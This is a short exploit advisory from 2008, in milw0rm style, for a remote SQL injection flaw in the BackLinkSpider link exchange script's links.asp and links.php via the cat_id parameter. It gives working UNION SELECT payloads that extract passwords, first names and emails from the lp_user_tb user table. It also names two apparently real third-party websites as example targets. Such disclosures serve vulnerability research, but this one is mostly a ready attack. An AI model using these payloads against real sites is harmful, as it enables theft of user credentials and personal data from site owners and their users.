The BackLinkSpider Exchange Links script suffers from remote SQL injection vulnerabilities in links.asp and links.php.
95bd3ddaba52709a0a2ff97a065ee4fb33c150b34551544104ec30c5b5dca58c
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] BackLinkSpider - Exchange links Script (links.asp?cat_id) and
(links.php?cat_id) Remote SQL Injection Vulnerability
[~]
[~] http://www.backlinkspider.com
[~]
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~]
[~] d3v1l@spoofer.com http://security-sh3ll.com
[~]
[~]
----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm Staff
[~]-----------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/links.php?cat_id=-1 UNION SELECT
1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20
from lp_user_tb--
[~] -1 UNION SELECT
1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20
from lp_user_tb--
[~]
[~]------------------------------------------------------------------------------------------------------------------------------------------------------
[~]
[~] Example :-
[~]
[~] links.asp?cat_id= ->
http://www.champagneandchocolates.com/links.asp?cat_id=SQL
[~]
[~]
[~] links.php?cat_id= -> http://www.quad-center.it/links.php?cat_id==SQL
[~]
[~]
[~]-------------------------------------------------------------------------------------------------------------------------------------------------------